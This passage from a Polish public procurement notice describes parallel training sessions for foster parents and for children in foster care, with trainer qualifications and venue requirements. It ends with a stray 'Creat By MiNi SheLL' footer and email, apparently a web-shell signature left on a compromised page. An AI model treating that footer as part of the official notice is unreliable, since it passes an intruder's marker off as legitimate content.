odwoławczego przysługuje skarga do sądu, która wnosi się do Sądu Okręgowego w Warszawie – sądu zamówień publicznych.<br/>Zajęcia dla rodziców/ opiekunów zastępczych oraz dzieci i młodzieży, w tym usamodzielnianych mają odbywać się<br/> równolegle w osobnych grupach:<br/> 1) szkolenie dla rodziców/opiekunów zastępczych Część I pkt a), Część II pkt a), Część III pkt a), Część IV pkt a), Część V<br/> pkt a) oraz Część VI pkt a) (planowana ilość uczestników do 20 osób) oraz dla dzieci i młodzieży przebywającej w pieczy<br/> zastępczej Część I pkt b), Część II pkt b, Część III pkt b), Część IV pkt b), Część V pkt b) oraz Część VI pkt b) (planowana<br/> ilość uczestników do 20 osób):<br/> a) wymiar: 4 godzin dydaktycznych (1 godzina = 45 minut),<br/> b) tematyka szkolenia: <br/>Części I pkt a), Część II pkt a), Część III pkt a), Część IV pkt a), Część V pkt a) oraz Część VI pkt a) powinna być<br/> dostosowana do grupy docelowej- rodzin zastępczych i prowadzących rodzinne domy dziecka,<br/> Części I pkt b), Część II pkt b), Część III pkt b), Część IV pkt b), Część V pkt b) oraz Część VI pkt b) i– powinna być<br/> dostosowana do grupy docelowej – dzieci i młodzieży przebywającej w pieczy zastępczej,<br/> c) wymagania stawiane prowadzącym szkolenie: osoby zdolne do wykonania zamówienia: − pedagog/socjolog/psycholog <br/>minimalne wymagania: kwalifikacje zawodowe: wykształcenie wyższe magisterskie na kierunku<br/> pedagogika/socjologia/psycholog oraz spełnianie warunków określonych w art. 7b ustawy z dnia 9 czerwca 2011 r. o<br/> wspieraniu rodziny i systemie pieczy zastępczej (Dz. U. z 2025 r. poz. 49). <br/>W zakresie niezbędnego doświadczenia do wykonywania obowiązków pedagoga/socjologa/psychologa należy wykazać, że<br/> wskazana w/w osoby posiadają co najmniej 2 - letnie doświadczenie w poradnictwie rodzinnym.<br/> d) Wykonawca zapewnia uczestnikom niezbędne materiały szkoleniowe oraz zaświadczenia uczestnictwa w zajęciach;- Miejsce realizacji usługi: to ośrodek na terenie woj. Wielkopolskiego lub na terenie województw ościennych. Mile widziane<br/> jest, aby Ośrodek był wyposażony basen oraz strefa wellness. Na terenie Ośrodka powinno znajdować się miejsce<br/> umożliwiające zorganizowanie warsztatów, spotkań oraz zajęć integracyjnych (sala szkoleniowa posiadająca klimatyzację,<br/> dzienne oświetlenie, wyposażona w laptop, rzutnik multimedialny kompatybilny z laptopem) oraz z salą zapewniającą<br/> możliwość przeprowadzenia warsztatów/ animacji dla dzieci i zajęć ruchowych dla młodzieży.<br/> Zamawiający zastrzega sobie możliwość zwiększenia/ zmniejszenia o 5 - 7 osób zamówienia w stosunku do planowanej<br/> liczby uczestników, a co za tym idzie zmianę kosztów usługi (rozliczenie nastąpi wg ceny brutto/osobę).<br/> Szczegółowe informacje znajdują się w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com